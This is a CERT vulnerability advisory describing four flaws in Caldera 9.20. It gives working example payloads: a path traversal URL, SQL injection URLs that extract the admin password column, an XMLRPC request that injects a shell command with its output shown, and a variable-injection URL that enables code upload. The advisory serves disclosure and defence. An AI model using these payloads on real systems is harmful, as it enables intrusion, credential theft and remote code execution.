search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Caldera 9.20 contains multiple vulnerabilities

Vulnerability Note VU#693092

Original Release Date: 2014-05-07 | Last Revised: 2014-05-07

Overview

Caldera 9.20, and possibly earlier versions, contains multiple vulnerabilities.

Description

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - CVE-2014-2933

Caldera 9.20 and possibly earlier versions contains a path traversal vulnerability due to the script '/dirmng/index.php' caused by improper limitation of a pathname to a restricted directory. An attacker can exploit this vulnerability to access arbitrary directories on the server's operating system.

Example:
/dirmng/index.php?PUBLIC=1&cdir=/

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - CVE-2014-2934
Caldera 9.20 and possibly earlier versions contains multiple script files that are vulnerable to a SQL injection due to improper neutralization of special elements used in an SQL command.

Examples:
/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin
/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0


CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - CVE-2014-2935
Caldera CostView as part of Caldera 9.20 contains a vulnerability that allows an unauthenticated user the execution of OS commands.

The script '/costview3/xmlrpc_server/xmlrpc.php' is vulnerable to command execution due to improper neutralization of special elements used in an OS command. It can be triggered by submitting a specifically crafted PHP XMLRPC request by an unauthenticated remote user.

Example:
$ cat get_cutter_tools.xml
<?phpxml version="1.0"?>
<methodCall>
<methodName>xmlrpc.get_cutter_tools_xmlrpc</methodName>
<params>
<param><value><string>cutter_name</string></value></param>
<param><value><string>; echo
"&lt;CalderaInfo>&lt;methods>&lt;item>&lt;type>`id`&lt;/type>&lt;/item>&lt;/methods>&lt;/CalderaInfo
>"</string></value></param>
</params>
</methodCall>
$ curl --data @get_cutter_tools.xml http://<host>/costview3/xmlrpc_server/xmlrpc.php
<?phpxml version="1.0"?>
<methodResponse>
<params>
<param>
<value><struct>
<member><name>get_cutter_tools_xmlrpc</name>
<value><array>
<data>
<value><string>uid=1002(caldera) gid=1001(caldera)
groups=1001(caldera),4(adm),7(lp),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),46(plugdev),103
(fuse),104(scanner),109(netdev)</string></value>
</data>
</array></value>
</member>
</struct></value>
</param>
</params>
</methodResponse>



CWE-627 - Dynamic Variable Evaluation - CVE-2014-2936
Caldera 9.20 and possibly earlier versions contains a directory manager component of Caldera 9.20 that allows the manipulation of variables in the global scope. There are various scripts that are vulnerable to global variable scope injection:

* /PPD/index.php
* /dirmng/docmd.php
* /dirmng/index.php
* /dirmng/param.php


This can be exploited by overwriting defined variables with arbitrary values during script runtime. This can be used to enable the upload function to store code within the web root directory structure. This results in an arbitrary code execution on the server.

Example:
/dirmng/index.php?maindir_hotfolder=/var/www/caldera/html/

The CVSS score below was calculated for CVE-2014-2935.

Impact

An unauthenticated attacker could access arbitrary directories on the server's operating system, access arbitrary database data, execute OS commands, or manipulate global variables.

Solution

We are currently unaware of a practical solution to this problem.

Restrict Access

As a general good security practice, only allow connections from trusted hosts and networks.

Vendor Information

693092
 
Affected   Unknown   Unaffected

Caldera

Notified:  March 25, 2014 Updated:  May 07, 2014

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.


CVSS Metrics

Group Score Vector
Base 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P
Temporal 5.7 E:U/RL:U/RC:UC
Environmental 5.3 CDP:LM/TD:M/CR:ND/IR:ND/AR:ND

References

Acknowledgements

Thanks to Thomas Fischer and Markus Wulftange of Daimler TSS GmbH, Ulm, Germany for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: CVE-2014-2933, CVE-2014-2934, CVE-2014-2935, CVE-2014-2936
Date Public: 2014-05-07
Date First Published: 2014-05-07
Date Last Updated: 2014-05-07 12:34 UTC
Document Revision: 10

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.